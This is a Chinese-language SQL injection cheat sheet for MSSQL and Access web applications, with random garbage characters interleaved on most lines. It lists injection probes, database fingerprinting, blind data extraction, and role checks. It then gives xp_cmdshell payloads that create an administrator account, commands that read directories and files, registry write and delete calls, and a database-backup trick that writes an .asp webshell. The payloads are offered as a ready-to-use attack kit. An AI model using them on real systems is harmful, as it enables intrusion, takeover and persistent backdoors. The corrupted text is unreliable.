1.判断是否有注入;and 1=1 ;and 1=2 ,�[��<$X{9
2.初步判断是否是mssql ;and user>0 %�CQ�v&d2�
KE-0/m�4yJ
3.注入参数是字符'and [查询条件] and ''=' �izu_��1�X
rds�Z[�i�i
4.搜索时没过滤参数的'and [查询条件] and '%25'=' VAA="�y�N
`3�*�QKi$�
5.判断数据库系统 yd[4l%G(zS
�o5:md �:\
;and (select count(*) from sysobjects)>0 mssql �E=��91k�.
�;*hVAxs1�
;and (select count(*) from msysobjects)>0 access FiS����x"o
q�2�s=>J';
S VypR LVB
b�XA�%|�7*
6.猜数据库 ;and (select Count(*) from [数据库名])>0 @>&b&u�j7T
={51fr�/C%
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 xVRxKM5 �{
�;.^!
�7�j
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ]x(�6^:�D5
���smn~p/u
9.(1)猜字段的ascii值(access) +S'�m<}"1�
'}:(y$9.`�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �>v���f-,B
^�]���Q.V
(2)猜字段的ascii值(mssql) Ti7
@{7>��
�=R�Z�PDu�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ]I��n�u'p\
<�[�w5M?n8
10.测试权限结构(mssql) &[SFl{fx>-
�&�PMfA�o^
ju�07�gzz
`�T�H\0/eE
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 1K(mdL{�m5
OUFy=5(%:
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- g<7Aln}Nl\
C�I�f@G>e-
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- eI-SWwmv/u
j-V�wY/X�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- vif)g6,��
I�Z��i��S3
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- u� /����DE
d���p&G(�[
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- %3�AE�2�"
y��%x:~.��
;and 1=(select IS_MEMBER('db_owner'));-- �$F�[+H Wf
\3"B$S�p|=
oE6`]�^�^�
��6b$C��/�
11.添加mssql和系统的帐户 ��4jGN:*kZ
|�QMmF"��0
;exec master.dbo.sp_addlogin username;-- !0P:G#�o-$
;exec master.dbo.sp_password null,username,password;-- �Ul6��|LTY
�Gt�
_tL%�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 0pG +�ye�c
:�U�=3*f.{
;exec master.dbo.xp_cmdshell 'net user username password &3�2�8pOT4
}fv�7Wh�Q�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- l9OpaO�VfJ
v*��F�bvrY
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 4_sJ0��=z-
#�s�B�L E
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �*w�Y�+yoj
��+a%D�+�
WPAU�Y�<6f
"A��&A��?%
12.(1)遍历目录 'o4`G�kNh)
�(5,x5l]-N
;create table dirs(paths varchar(100), id int) �?1c7w�Ek
�cruBJZr*�
;insert dirs exec master.dbo.xp_dirtree 'c:\' RAk"C!&�^m
')~V�=��F�
;and (select top 1 paths from dirs)>0 z��wRF-{�s
[]aw;\7�}Y
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) E��a][�:3�
Yw]$/o�P�`
);_����/0:
/5z,G r��
(2)遍历目录 @�$ �Nti�>
K*2s-,b� *
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- }{j@q~�w>$
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 0Zp5y�@�V8
at{p4Sl
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 qg��1�\ABH
,
V,Q(�!$F
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 U�`8Er4�8X
Z2`M8�xEiH
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �l2�Y�ClK
X%znN����x
�4c�{j9�mh
���)�=X� g
13.mssql中的存储过程 d$x� vE�m
��E�>i�<2
xp_regenumvalues 注册表根键, 子键 jO5R�~��O`
@t�1pB�]O:
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 n1JV��)4Mv
}�CMGK��{�
xp_regread 根键,子键,键值名 ~@�P����D\
��=��M4:nt
;exec xp_regread ��E`(=n(Qu
"4Q_F3?_`
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 8�@(?E[&O>
�&4}�=@'G@
xp_regwrite 根键,子键, 值名, 值类型, 值 lw}7kp4
2F
�94dd )�/a
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 iu*&Jz)D>
,a�yJg�A�D
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �$�N}�t)iA
/5�"T46j�D
xp_regdeletevalue 根键,子键,值名 _h � \�L6.
=Hn�--DEMg
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 R"��JXWw�
p�%�s��izn
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 @R%�q�P>_
D_JGbNig�A
73�.���+0x
�vk�
X+{�n
14.mssql的backup创建webshell [
�'�t.x=
U*\K<f�w �
use model o3|4PA��A/
na~ FT[3�C
create table cmd(str image); t$�Ff��$�(
�6("bdx;�!
insert into cmd(str) values (''); F�<6(H�w#>
� ^,ISz-�4
backup database model to disk='c:\l.asp'; I��;��E?;i
PM�bZv%.,-
[�:gg3Qz�x
>l��Q�a"F=
15.mssql内置函数 R�-NM� ~gp
er��c�Xw7{
;and (select @@version)>0 获得Windows的版本号 S �;rd0+�J
�hF@�%k
;I
;and user_name()='dbo' 判断当前系统的连接用户是不是sa %CvVu�)�tc
9D�M,,h<�`
;and (select user_name())>0 爆当前系统的连接用户 =M*pym]QSY
+���jwk4BU
;and (select db_name())>0 得到当前连接的数据库 =$�gBW�S�
'/0�3m\7�
=��<S�n&uL
hI�*v��)�c
16.简洁的webshell �s�K+�uw�t
_Y&.���N�w
use model
�H,�GjPIG
Xy� �K,��
create table cmd(str image); %(khE�-�SW
���SZ[?2�z
insert into cmd(str) values (''); =gR/ t@Ld
0El�EaH�1z
backup database model to disk='g:\wwwtest\l.asp';
